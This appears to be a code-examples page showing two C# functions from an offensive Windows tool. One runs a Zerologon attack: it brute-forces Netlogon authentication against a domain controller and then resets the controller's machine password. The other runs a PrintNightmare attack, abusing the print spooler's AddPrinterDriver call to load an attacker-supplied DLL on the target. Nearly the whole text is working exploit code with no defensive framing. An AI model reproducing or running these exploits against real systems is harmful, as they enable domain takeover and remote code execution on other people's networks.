Example #1
0
        public static bool RunZerologon(string mode, string target, string machineaccount, int auth, bool nullsession)
        {
            bool success = false;

            Console.Write("[*] ");


            rpcConn = DCSync.CreateBinding(target, null, auth, nullsession: nullsession);

            if (rpcConn == IntPtr.Zero)
            {
                Console.WriteLine("Error CreateBinding");
                return(false);
            }

            NTSTATUS rpcStatus = (NTSTATUS)RpcEpResolveBinding(rpcConn, GetClientInterface());

            if (rpcStatus != NTSTATUS.Success)
            {
                Console.WriteLine("[x] Error RpcEpResolveBinding {0}", (int)rpcStatus);

                return(false);
            }

            for (int i = 0; i < MAX_ATTEMPTS; i++)
            {
                success = Tryzerologonenticate(machineaccount);

                if (success == false)
                {
                    Console.Write("=");
                }
                else
                {
                    Console.WriteLine("[*]");
                    Console.WriteLine("[*] Authentication: Ok target vulnerable");

                    if (!mode.Equals("check"))
                    {
                        NTSTATUS status = ChangeDCPassword(machineaccount);

                        if (status == NTSTATUS.Success)
                        {
                            Console.WriteLine("[*] Set password: Ok");
                            return(true);
                        }
                    }
                    else
                    {
                        return(true);
                    }

                    break;
                }
            }



            return(false);
        }
Example #2
0
        public static bool RunPrintNightmare(string target, string exploit_path, string authuser, string authdomain, string authpassword, int auth = DCSync.RPC_C_AUTHN_GSS_NEGOTIATE, string altservice = "host")
        {
            Console.WriteLine("[*] ");

            rpcConn = DCSync.CreateBinding(target, altservice, auth, authuser, authdomain, authpassword, impersonationType: DCSync.RPC_C_IMP_LEVEL_DELEGATE);

            if (rpcConn == IntPtr.Zero)
            {
                Console.WriteLine("Error CreateBinding");
                return(false);
            }

            NTSTATUS rpcStatus = (NTSTATUS)RpcEpResolveBinding(rpcConn, GetClientInterface());

            if (rpcStatus != NTSTATUS.Success)
            {
                Console.WriteLine("[x] Error RpcEpResolveBinding {0}", (int)rpcStatus);

                return(false);
            }

            rpcStatus = (NTSTATUS)RpcBindingSetObject(rpcConn, ref PAR_ObjectUUID);

            if (rpcStatus != NTSTATUS.Success)
            {
                Console.WriteLine("[x] Error RpcBindingSetOption {0}", (int)rpcStatus);

                return(false);
            }

            string driverpath = FindDriverPath(rpcConn);

            driverpath += "\\unidrv.dll";
            Console.WriteLine("[*] DriverPath: {0}", driverpath);

            string        environment = "Windows x64";
            DRIVER_INFO_2 dvi2        = new DRIVER_INFO_2
            {
                cVersion     = 3,
                pDataFile    = exploit_path,
                pEnvironment = environment,
                pDriverPath  = driverpath,
                pName        = RandomString(10)
            };

            if (AddPrinterDriver(dvi2, rpcConn, "C:\\Windows\\System32\\kernelbase.dll"))
            {
                dvi2.pName = RandomString(10);
                string[] p = exploit_path.Split('\\');
                if (AddPrinterDriver(dvi2, rpcConn, p[p.Length - 1]))
                {
                    Console.WriteLine();
                    return(true);
                }
            }

            return(false);
        }